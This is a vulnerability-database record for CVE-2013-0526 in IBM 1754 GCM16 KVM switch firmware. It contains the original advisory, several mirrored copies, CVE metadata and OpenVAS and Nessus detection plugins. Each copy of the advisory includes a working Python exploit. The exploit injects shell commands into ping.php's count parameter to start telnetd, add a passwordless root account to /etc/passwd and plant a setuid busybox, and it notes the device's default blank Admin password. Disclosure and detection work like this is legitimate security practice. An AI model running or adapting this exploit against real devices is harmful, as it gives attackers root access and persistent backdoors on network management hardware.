ID PACKETSTORM:122843 Type packetstorm Reporter Alejandro Alvarez Bravo Modified 2013-08-16T00:00:00
Description
`I. Product description
The IBM 1754 GCM family provides KVM over IP and serial console management
technology in a single appliance.
II. Vulnerability information
Impact: Command execution
Remotely exploitable: yes
CVE: 2013-0526
CVS Score: 8.5
III. Vulnerability details
GCM16 (v.1.18.0.22011) and older versions of this KVM switch contain a flaw
that allows a remote authenticated user to execute unauthorized commands as
root.
This flaw exist because webapp variables are not sanitised. In this case,
parameters $count and $size from ping.php allow to create a special crafted
URL to inject text to an exec() so it can be arbitrary used to execute any
command on the KVM embedded linux.
IV. Proof of concept
Following is a simple exploit that lead to root access to the device,
opening a telnet and creating a new user with root permission without
password (sessid and target are hardcoded so it must be changed to work):
#!/usr/bin/python
"""
This exploit for Avocent KVM switch allows to gain root access to embedded
device. SessionId (avctSessionId) is neccesary for this to work, so you
need a valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su - superb" to gain root
"""
from StringIO import StringIO
import pycurl
import re
sessid = "XXXXXXXXX"
target = "https://ip.of.kvm/ping.php" <https://172.30.30.40/ping.php>
command = "/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd
; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to
device using telnet with user target and pass target, then \"/tmp/su -
superb\""
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, target)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1
; echo *E* ; ' + command + ' ; echo *E*')
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try:
c.perform()
c.close()
except:
print ""
content = storage.getvalue()
x1 = re.search(r"\*E\*(.*)\*E\*",content)
print x1.group(1).replace("<br />","\n")
V. Vendor Response
IBM released a new firmware that corrects this vulnerability (1.20.0.22575)
VI. Timeline
2013-06-12 - Vendor (IBM PSIRT) notified.
2013-06-12 - Vendor assigns internal ID.
2013-07-02 - Vendor confirms the vulnerability.
2013-08-16 - Vulnerability disclosed and patch released.
VII. External information
Information about this vulnerability (in spanish):
http://www.bitcloud.es/2013/08/vulnerabilidad-en-kvms-gcm1632-de-ibm.html
IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509
--
--
Alejandro Alvarez Bravo
alex.a.bravo@gmail.com
`
{"id": "PACKETSTORM:122843", "type": "packetstorm", "bulletinFamily": "exploit", "title": "IBM 1754 GCM16 1.18.0.22011 Command Execution", "description": "", "published": "2013-08-16T00:00:00", "modified": "2013-08-16T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 8.5}, "href": "https://packetstormsecurity.com/files/122843/IBM-1754-GCM16-1.18.0.22011-Command-Execution.html", "reporter": "Alejandro Alvarez Bravo", "references": [], "cvelist": ["CVE-2013-0526"], "lastseen": "2016-12-05T22:15:44", "viewCount": 6, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2016-12-05T22:15:44", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-0526"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103768"]}, {"type": "zdt", "idList": ["1337DAY-ID-21122"]}, {"type": "nessus", "idList": ["IBM_GCM_KVM_MIGR-5093509.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:27706"]}], "modified": "2016-12-05T22:15:44", "rev": 2}, "vulnersScore": 6.6}, "sourceHref": "https://packetstormsecurity.com/files/download/122843/IBM1754-exec.txt", "sourceData": "`I. Product description \n \nThe IBM 1754 GCM family provides KVM over IP and serial console management \ntechnology in a single appliance. \n \n \nII. Vulnerability information \n \nImpact: Command execution \nRemotely exploitable: yes \nCVE: 2013-0526 \nCVS Score: 8.5 \n \n \nIII. Vulnerability details \n \nGCM16 (v.1.18.0.22011) and older versions of this KVM switch contain a flaw \nthat allows a remote authenticated user to execute unauthorized commands as \nroot. \n \nThis flaw exist because webapp variables are not sanitised. In this case, \nparameters $count and $size from ping.php allow to create a special crafted \nURL to inject text to an exec() so it can be arbitrary used to execute any \ncommand on the KVM embedded linux. \n \n \nIV. Proof of concept \n \nFollowing is a simple exploit that lead to root access to the device, \nopening a telnet and creating a new user with root permission without \npassword (sessid and target are hardcoded so it must be changed to work): \n \n \n#!/usr/bin/python \n \n\"\"\" \n \nThis exploit for Avocent KVM switch allows to gain root access to embedded \ndevice. SessionId (avctSessionId) is neccesary for this to work, so you \nneed a valid user. Default user is \"Admin\" with blank password. \n \nAfter running exploit, connect using telnet to device with user target \n(pass: target) then do \"/tmp/su - superb\" to gain root \n \n\"\"\" \n \nfrom StringIO import StringIO \nimport pycurl \nimport re \nsessid = \"XXXXXXXXX\" \ntarget = \"https://ip.of.kvm/ping.php\" <https://172.30.30.40/ping.php> \n \ncommand = \"/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd \n; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to \ndevice using telnet with user target and pass target, then \\\"/tmp/su - \nsuperb\\\"\" \n \nstorage = StringIO() \nc = pycurl.Curl() \nc.setopt(c.URL, target) \nc.setopt(c.SSL_VERIFYPEER,0) \nc.setopt(c.SSL_VERIFYHOST,0) \nc.setopt(c.WRITEFUNCTION,storage.write) \nc.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1 \n; echo *E* ; ' + command + ' ; echo *E*') \nc.setopt(c.COOKIE,'avctSessionId=' + sessid) \n \ntry: \nc.perform() \nc.close() \nexcept: \nprint \"\" \n \ncontent = storage.getvalue() \nx1 = re.search(r\"\\*E\\*(.*)\\*E\\*\",content) \nprint x1.group(1).replace(\"<br />\",\"\\n\") \n \n \nV. Vendor Response \n \nIBM released a new firmware that corrects this vulnerability (1.20.0.22575) \n \n \nVI. Timeline \n \n2013-06-12 - Vendor (IBM PSIRT) notified. \n2013-06-12 - Vendor assigns internal ID. \n2013-07-02 - Vendor confirms the vulnerability. \n2013-08-16 - Vulnerability disclosed and patch released. \n \n \nVII. External information \n \nInformation about this vulnerability (in spanish): \nhttp://www.bitcloud.es/2013/08/vulnerabilidad-en-kvms-gcm1632-de-ibm.html \nIBM Security Bulletin: \nhttp://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509 \n \n \n \n-- \n-- \nAlejandro Alvarez Bravo \nalex.a.bravo@gmail.com \n`\n"}
{"cve": [{"lastseen": "2020-12-09T19:52:36", "description": "ping.php in Global Console Manager 16 (GCM16) and Global Console Manager 32 (GCM32) before 1.20.0.22575 on the IBM Avocent 1754 KVM switch allows remote authenticated users to execute arbitrary commands via shell metacharacters in the (1) count or (2) size parameter.", "edition": 5, "cvss3": {}, "published": "2013-08-21T16:55:00", "title": "CVE-2013-0526", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0526"], "modified": "2017-08-29T01:33:00", "cpe": ["cpe:/o:ibm:global_console_manager_32_firmware:1.18.0.22011", "cpe:/o:ibm:global_console_manager_16_firmware:1.18.0.22011"], "id": "CVE-2013-0526", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0526", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:ibm:global_console_manager_16_firmware:1.18.0.22011:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:global_console_manager_32_firmware:1.18.0.22011:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-03-27T19:10:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0526"], "description": "IBM 1754 GCM16 and GCM32 Global Console Managers are prone to multiple\n command-execution vulnerabilities because they fail to sanitize user-supplied input.", "modified": "2020-03-26T00:00:00", "published": "2013-08-19T00:00:00", "id": "OPENVAS:1361412562310103768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103768", "type": "openvas", "title": "IBM 1754 GCM16 and GCM32 Global Console Managers Multiple Command Execution Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IBM 1754 GCM16 and GCM32 Global Console Managers Multiple Command Execution Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103768\");\n script_bugtraq_id(61816);\n script_cve_id(\"CVE-2013-0526\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_version(\"2020-03-26T08:48:45+0000\");\n\n script_name(\"IBM 1754 GCM16 and GCM32 Global Console Managers Multiple Command Execution Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/61816\");\n\n script_tag(name:\"last_modification\", value:\"2020-03-26 08:48:45 +0000 (Thu, 26 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-08-19 15:12:16 +0200 (Mon, 19 Aug 2013)\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_snmp_sysdesc.nasl\");\n script_require_udp_ports(\"Services/udp/snmp\", 161);\n script_mandatory_keys(\"SNMP/sysdesc/available\");\n\n script_tag(name:\"impact\", value:\"Successful exploit of these issues may allow an attacker to execute\n arbitrary commands with the privileges of the root user.\");\n\n script_tag(name:\"vuldetect\", value:\"Check if the firmware version is greater than 1.18.0.22011.\");\n\n script_tag(name:\"insight\", value:\"IBM 1754 GCM16 and GCM32 versions 1.18.0.22011 and below contain a flaw\n that allows a remote authenticated user to execute unauthorized commands as\n root. This flaw exist because webapp variables are not sanitized.\");\n\n script_tag(name:\"affected\", value:\"IBM 1754 GCM16 Global Console Manager 1.18.0.22011 and prior\n\n IBM 1754 GCM32 Global Console Manager 1.18.0.22011 and prior.\");\n\n script_tag(name:\"solution\", value:\"Updates (Version 1.18.0.22011) are available.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"IBM 1754 GCM16 and GCM32 Global Console Managers are prone to multiple\n command-execution vulnerabilities because they fail to sanitize user-supplied input.\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"snmp_func.inc\");\n\nport = snmp_get_port(default:161);\nsysdesc = snmp_get_sysdesc(port:port);\nif(!sysdesc || !egrep(pattern:\"^GCM(16|32)\", string:sysdesc))exit(0);\n\nversion = eregmatch(pattern:\"GCM(16|32) ([0-9.]+)\", string: sysdesc);\nif(isnull(version[2]))exit(0);\n\nvers = version[2];\n\nif(version_is_less(version:vers, test_version:\"1.18.0.22011\")) {\n security_message(port:0);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-20T03:21:40", "edition": 2, "description": "IBM 1754 GCM16 versions 1.18.0.22011 and below contain a flaw that allows a remote authenticated user to execute unauthorized commands as root. This flaw exist because webapp variables are not sanitized. In this case, parameters $count and $size from ping.php allow to create a special crafted URL to inject text to an exec() so it can be arbitrary used to execute any command on the KVM embedded linux.", "published": "2013-08-17T00:00:00", "type": "zdt", "title": "IBM 1754 GCM16 1.18.0.22011 Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0526"], "modified": "2013-08-17T00:00:00", "id": "1337DAY-ID-21122", "href": "https://0day.today/exploit/description/21122", "sourceData": "I. Product description\r\n\r\nThe IBM 1754 GCM family provides KVM over IP and serial console management\r\ntechnology in a single appliance.\r\n\r\n\r\nII. Vulnerability information\r\n\r\nImpact: Command execution\r\nRemotely exploitable: yes\r\nCVE: 2013-0526\r\nCVS Score: 8.5\r\n\r\n\r\nIII. Vulnerability details\r\n\r\nGCM16 (v.1.18.0.22011) and older versions of this KVM switch contain a flaw\r\nthat allows a remote authenticated user to execute unauthorized commands as\r\nroot.\r\n\r\nThis flaw exist because webapp variables are not sanitised. In this case,\r\nparameters $count and $size from ping.php allow to create a special crafted\r\nURL to inject text to an exec() so it can be arbitrary used to execute any\r\ncommand on the KVM embedded linux.\r\n\r\n\r\nIV. Proof of concept\r\n\r\nFollowing is a simple exploit that lead to root access to the device,\r\nopening a telnet and creating a new user with root permission without\r\npassword (sessid and target are hardcoded so it must be changed to work):\r\n\r\n\r\n#!/usr/bin/python\r\n\r\n\"\"\"\r\n\r\nThis exploit for Avocent KVM switch allows to gain root access to embedded\r\ndevice. SessionId (avctSessionId) is neccesary for this to work, so you\r\nneed a valid user. Default user is \"Admin\" with blank password.\r\n\r\nAfter running exploit, connect using telnet to device with user target\r\n(pass: target) then do \"/tmp/su - superb\" to gain root\r\n\r\n\"\"\"\r\n\r\nfrom StringIO import StringIO\r\nimport pycurl\r\nimport re\r\nsessid = \"XXXXXXXXX\"\r\ntarget = \"https://ip.of.kvm/ping.php\" <https://172.30.30.40/ping.php>\r\n\r\ncommand = \"/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd\r\n; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to\r\ndevice using telnet with user target and pass target, then \\\"/tmp/su -\r\nsuperb\\\"\"\r\n\r\nstorage = StringIO()\r\nc = pycurl.Curl()\r\nc.setopt(c.URL, target)\r\nc.setopt(c.SSL_VERIFYPEER,0)\r\nc.setopt(c.SSL_VERIFYHOST,0)\r\nc.setopt(c.WRITEFUNCTION,storage.write)\r\nc.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1\r\n; echo *E* ; ' + command + ' ; echo *E*')\r\nc.setopt(c.COOKIE,'avctSessionId=' + sessid)\r\n\r\ntry:\r\n c.perform()\r\n c.close()\r\nexcept:\r\n print \"\"\r\n\r\ncontent = storage.getvalue()\r\nx1 = re.search(r\"\\*E\\*(.*)\\*E\\*\",content)\r\nprint x1.group(1).replace(\"<br />\",\"\\n\")\r\n\r\n\r\nV. Vendor Response\r\n\r\nIBM released a new firmware that corrects this vulnerability (1.20.0.22575)\r\n\r\n\r\nVI. Timeline\r\n\r\n2013-06-12 - Vendor (IBM PSIRT) notified.\r\n2013-06-12 - Vendor assigns internal ID.\r\n2013-07-02 - Vendor confirms the vulnerability.\r\n2013-08-16 - Vulnerability disclosed and patch released.\r\n\r\n\r\nVII. External information\r\n\r\nInformation about this vulnerability (in spanish):\r\nhttp://www.bitcloud.es/2013/08/vulnerabilidad-en-kvms-gcm1632-de-ibm.html\r\nIBM Security Bulletin:\r\nhttp://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509\r\n\r\n\r\n\r\n-- \r\n--\r\nAlejandro Alvarez Bravo\r\n[email\u00a0protected]\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21122"}], "exploitdb": [{"lastseen": "2016-02-03T06:32:17", "description": "IBM 1754 GCM 1.18.0.22011 - Remote Command Execution. CVE-2013-0526. Remote exploit for hardware platform", "published": "2013-08-19T00:00:00", "type": "exploitdb", "title": "IBM 1754 GCM 1.18.0.22011 - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0526"], "modified": "2013-08-19T00:00:00", "id": "EDB-ID:27706", "href": "https://www.exploit-db.com/exploits/27706/", "sourceData": "I. Product description\r\n\r\nThe IBM 1754 GCM family provides KVM over IP and serial console management\r\ntechnology in a single appliance.\r\n\r\n\r\nII. Vulnerability information\r\n\r\nImpact: Command execution\r\nRemotely exploitable: yes\r\nCVE: 2013-0526\r\nCVS Score: 8.5\r\n\r\n\r\nIII. Vulnerability details\r\n\r\nGCM16 (v.1.18.0.22011) and older versions of this KVM switch contain a flaw\r\nthat allows a remote authenticated user to execute unauthorized commands as\r\nroot.\r\n\r\nThis flaw exist because webapp variables are not sanitised. In this case,\r\nparameters $count and $size from ping.php allow to create a special crafted\r\nURL to inject text to an exec() so it can be arbitrary used to execute any\r\ncommand on the KVM embedded linux.\r\n\r\n\r\nIV. Proof of concept\r\n\r\nFollowing is a simple exploit that lead to root access to the device,\r\nopening a telnet and creating a new user with root permission without\r\npassword (sessid and target are hardcoded so it must be changed to work):\r\n\r\n\r\n#!/usr/bin/python\r\n\r\n\"\"\"\r\n\r\nThis exploit for Avocent KVM switch allows to gain root access to embedded\r\ndevice. SessionId (avctSessionId) is neccesary for this to work, so you\r\nneed a valid user. Default user is \"Admin\" with blank password.\r\n\r\nAfter running exploit, connect using telnet to device with user target\r\n(pass: target) then do \"/tmp/su - superb\" to gain root\r\n\r\n\"\"\"\r\n\r\nfrom StringIO import StringIO\r\nimport pycurl\r\nimport re\r\nsessid = \"XXXXXXXXX\"\r\ntarget = \"https://ip.of.kvm/ping.php\" <https://172.30.30.40/ping.php>\r\n\r\ncommand = \"/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd\r\n; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to\r\ndevice using telnet with user target and pass target, then \\\"/tmp/su -\r\nsuperb\\\"\"\r\n\r\nstorage = StringIO()\r\nc = pycurl.Curl()\r\nc.setopt(c.URL, target)\r\nc.setopt(c.SSL_VERIFYPEER,0)\r\nc.setopt(c.SSL_VERIFYHOST,0)\r\nc.setopt(c.WRITEFUNCTION,storage.write)\r\nc.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1\r\n; echo *E* ; ' + command + ' ; echo *E*')\r\nc.setopt(c.COOKIE,'avctSessionId=' + sessid)\r\n\r\ntry:\r\n c.perform()\r\n c.close()\r\nexcept:\r\n print \"\"\r\n\r\ncontent = storage.getvalue()\r\nx1 = re.search(r\"\\*E\\*(.*)\\*E\\*\",content)\r\nprint x1.group(1).replace(\"<br />\",\"\\n\")\r\n\r\n\r\nV. Vendor Response\r\n\r\nIBM released a new firmware that corrects this vulnerability (1.20.0.22575)\r\n\r\n\r\nVI. Timeline\r\n\r\n2013-06-12 - Vendor (IBM PSIRT) notified.\r\n2013-06-12 - Vendor assigns internal ID.\r\n2013-07-02 - Vendor confirms the vulnerability.\r\n2013-08-16 - Vulnerability disclosed and patch released.\r\n\r\n\r\nVII. External information\r\n\r\nInformation about this vulnerability (in spanish):\r\nhttp://www.bitcloud.es/2013/08/vulnerabilidad-en-kvms-gcm1632-de-ibm.html\r\nIBM Security Bulletin:\r\nhttp://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509\r\n\r\n\r\n\r\n-- \r\n--\r\nAlejandro Alvarez Bravo\r\nalex.a.bravo@gmail.com", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/27706/"}], "nessus": [{"lastseen": "2021-01-01T03:16:15", "description": "According to its self-reported version, the remote host is an IBM\nGlobal Console Manager KVM switch with a firmware version prior to\n1.20.0.22575. It is, therefore, affected by a remote code execution\nvulnerability that could allow an authenticated attacker to execute\ncommands as root via the 'ping.php' script's 'count' and 'size'\nparameters.", "edition": 24, "published": "2014-08-05T00:00:00", "title": "IBM GCM16 / GCM32 Global Console Manager KVM Switch Firmware Version < 1.20.0.22575 Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0526"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/h:ibm:avocent_1754_kvm", "cpe:/o:ibm:global_console_manager_16_firmware", "cpe:/o:ibm:global_console_manager_32_firmware"], "id": "IBM_GCM_KVM_MIGR-5093509.NASL", "href": "https://www.tenable.com/plugins/nessus/77002", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77002);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n\n script_cve_id(\"CVE-2013-0526\");\n script_bugtraq_id(61816);\n\n script_name(english:\"IBM GCM16 / GCM32 Global Console Manager KVM Switch Firmware Version < 1.20.0.22575 Remote Code Execution\");\n script_summary(english:\"Checks the firmware version of the Global Console Manager.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The web interface running on the remote host is affected by a remote\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote host is an IBM\nGlobal Console Manager KVM switch with a firmware version prior to\n1.20.0.22575. It is, therefore, affected by a remote code execution\nvulnerability that could allow an authenticated attacker to execute\ncommands as root via the 'ping.php' script's 'count' and 'size'\nparameters.\");\n # http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1bdd4878\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to firmware version 1.20.0.22575 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:ibm:avocent_1754_kvm\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/o:ibm:global_console_manager_16_firmware\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/o:ibm:global_console_manager_32_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ibm_gcm_kvm_detect.nbin\");\n script_require_keys(\"Host/IBM/GCM/Version\",\"Host/IBM/GCM/Model\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/IBM/GCM/Version\");\nmodel = get_kb_item_or_exit(\"Host/IBM/GCM/Model\");\n\ncutoff_version = \"1.18.0.22011\";\nfixed_version = \"1.20.0.22575\";\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Model : ' + model +\n '\\n Installed firmware version : ' + version +\n '\\n Fixed firmware version : ' + fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(port:0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"GCM Firmware\", version);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}]}
